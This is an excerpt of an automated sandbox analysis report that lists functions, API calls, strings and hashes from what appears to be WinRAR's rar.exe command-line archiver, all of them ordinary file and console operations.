                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: H9
                                                                                                                                                                                                                                • API String ID: 0-2207570329
                                                                                                                                                                                                                                • Opcode ID: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
                                                                                                                                                                                                                                • Instruction ID: 7db19bb5408cd4db06d1899e062c8219018f035c593aa9f92cf56be554915848
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3E1CF62A08A9285EB11DF26E048BFD23E5EB4678CF454475DE1D837C5EF38E66AC700
                                                                                                                                                                                                                                Function 00007FF6FAA42574 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1858 7ff6faa42574-7ff6faa4259c 1859 7ff6faa4259e-7ff6faa425a0 1858->1859 1860 7ff6faa425a5-7ff6faa425a9 1858->1860 1861 7ff6faa4273a-7ff6faa42756 1859->1861 1862 7ff6faa425ab-7ff6faa425b6 GetStdHandle 1860->1862 1863 7ff6faa425ba-7ff6faa425c6 1860->1863 1862->1863 1864 7ff6faa42619-7ff6faa42637 WriteFile 1863->1864 1865 7ff6faa425c8-7ff6faa425cd 1863->1865 1868 7ff6faa4263b-7ff6faa4263e 1864->1868 1866 7ff6faa425cf-7ff6faa42609 WriteFile 1865->1866 1867 7ff6faa42644-7ff6faa42648 1865->1867 1866->1867 1871 7ff6faa4260b-7ff6faa42615 1866->1871 1869 7ff6faa4264e-7ff6faa42652 1867->1869 1870 7ff6faa42733-7ff6faa42737 1867->1870 1868->1867 1868->1870 1869->1870 1872 7ff6faa42658-7ff6faa42692 GetLastError call 7ff6faa43144 SetLastError 1869->1872 1870->1861 1871->1866 1873 7ff6faa42617 1871->1873 1878 7ff6faa426bc-7ff6faa426d0 call 7ff6faa3c95c 1872->1878 1879 7ff6faa42694-7ff6faa426a2 1872->1879 1873->1868 1885 7ff6faa42721-7ff6faa4272e call 7ff6faa3cf14 1878->1885 1886 7ff6faa426d2-7ff6faa426db 1878->1886 1879->1878 1880 7ff6faa426a4-7ff6faa426ab 1879->1880 1880->1878 1882 7ff6faa426ad-7ff6faa426b7 call 7ff6faa3cf34 1880->1882 1882->1878 1885->1870 1886->1863 1887 7ff6faa426e1-7ff6faa426e3 1886->1887 1887->1863 1889 7ff6faa426e9-7ff6faa4271c 1887->1889 1889->1863
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3350704910-0
                                                                                                                                                                                                                                • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                • Instruction ID: 77b7c104f0778c6e46c79abec2ef483c7d29c9d3d8ed14f8e5dda1f62ab0af4b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C51C622A0864187EB24DF25E51437AB7A0FB48B84F540175EE6E87AE4EF3DE54FC600
                                                                                                                                                                                                                                Function 00007FF6FAA41E80 Relevance: 7.6, APIs: 5, Instructions: 127filetimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1894 7ff6faa41e80-7ff6faa41ebb call 7ff6faa7a5a0 1897 7ff6faa41ec8 1894->1897 1898 7ff6faa41ebd-7ff6faa41ec1 1894->1898 1900 7ff6faa41ecb-7ff6faa41f57 CreateFileW 1897->1900 1898->1897 1899 7ff6faa41ec3-7ff6faa41ec6 1898->1899 1899->1900 1901 7ff6faa41f59-7ff6faa41f76 GetLastError call 7ff6faa54534 1900->1901 1902 7ff6faa41fcd-7ff6faa41fd1 1900->1902 1912 7ff6faa41f78-7ff6faa41fb6 CreateFileW GetLastError 1901->1912 1913 7ff6faa41fba 1901->1913 1904 7ff6faa41ff7-7ff6faa4200f 1902->1904 1905 7ff6faa41fd3-7ff6faa41fd7 1902->1905 1907 7ff6faa42027-7ff6faa4204b call 7ff6faa7a610 1904->1907 1908 7ff6faa42011-7ff6faa42022 call 7ff6faa6a9e8 1904->1908 1905->1904 1906 7ff6faa41fd9-7ff6faa41ff1 SetFileTime 1905->1906 1906->1904 1908->1907 1912->1902 1915 7ff6faa41fb8 1912->1915 1916 7ff6faa41fbf-7ff6faa41fc1 1913->1916 1915->1916 1916->1902 1917 7ff6faa41fc3 1916->1917 1917->1902
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1999340476-0
                                                                                                                                                                                                                                • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                • Instruction ID: f2abd5f558c0dd06d9bce53c9988fa0f3e3dcc2bab249ef81c197445d21afee5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF413773A1868146FB618F24E5057AA6A90BB45BB8F100335EE7D836D8FF7DC44B8B40
                                                                                                                                                                                                                                Function 00007FF6FAA36AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                • Instruction ID: 0d8f49573899d37e6796cbf07233e01b243c9e0cfc37ce8d3223156480ec0639
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E041A022A1868281FB50EF25D8111BA23A0FF557A4F401175EABD877D9FF3DD55AC700
                                                                                                                                                                                                                                Function 00007FF6FAA57E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                                • String ID: rar.lng
                                                                                                                                                                                                                                • API String ID: 553376247-2410228151
                                                                                                                                                                                                                                • Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                                • Instruction ID: 2d87953339ba604c747c3d9355b3c574f6609c23533343bf9b67478eeaf825e8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7341BF21E0C7824AFB10EB64A4121B923A09F42794F5855B5E97EC73D7FE2EE40F8710
                                                                                                                                                                                                                                Function 00007FF6FAA540A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SHGetMalloc.SHELL32(?,00000800,?,00007FF6FAA54432,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA540C4
                                                                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA540DF
                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32 ref: 00007FF6FAA540F1
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA43458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6FAA5413F,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA434A0
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA43458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6FAA5413F,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA434D5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                • String ID: WinRAR
                                                                                                                                                                                                                                • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                • Instruction ID: 178536be2d98375e40d85bb305ea9cffdf48b940604681a889333ae6d5ccdff1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21C022A08B4281EB509F26F9501BA6361BF89BD0F085071EF2E873D9FE3DD04A8700
                                                                                                                                                                                                                                Function 00007FF6FAA8978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF6FAA83CEF,?,?,00000000,00007FF6FAA83CAA,?,?,00000000,00007FF6FAA83FD9), ref: 00007FF6FAA897A5
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6FAA83CEF,?,?,00000000,00007FF6FAA83CAA,?,?,00000000,00007FF6FAA83FD9), ref: 00007FF6FAA89807
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6FAA83CEF,?,?,00000000,00007FF6FAA83CAA,?,?,00000000,00007FF6FAA83FD9), ref: 00007FF6FAA89841
                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6FAA83CEF,?,?,00000000,00007FF6FAA83CAA,?,?,00000000,00007FF6FAA83FD9), ref: 00007FF6FAA8986B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1557788787-0
                                                                                                                                                                                                                                • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                • Instruction ID: 5e7cfa51f1555e40d9dc060ecc4e8f56b1e9a21e79c6a7617be4257b5891a8de
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8213035E1C79281E7208F12A440129A7A4FB58FD1F484175DEAEA7BD8EF3CE4578744
                                                                                                                                                                                                                                Function 00007FF6FAA41C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2244327787-0
                                                                                                                                                                                                                                • Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                • Instruction ID: 0eda8f488714bbdb4d4190bffceb1263b75e49e34eaafa851b7043f14e72b2e7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C021A521E0CA4681EBA28B25E50033962A4BF45BD8F1445B2FD7DC76E8EF2DD49A8741
                                                                                                                                                                                                                                Function 00007FF6FAA349F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: AFUM$default.sfx
                                                                                                                                                                                                                                • API String ID: 0-2491287583
                                                                                                                                                                                                                                • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                • Instruction ID: 8cc372337e0ab4260059d2635775570b8060c952cdb9856d072f381ed791ff4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C81B321E0C78242EB719F1191122B922A0BF55786F4480B1DEEDC76C6FF2EA49FC710
                                                                                                                                                                                                                                Function 00007FF6FAA865BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
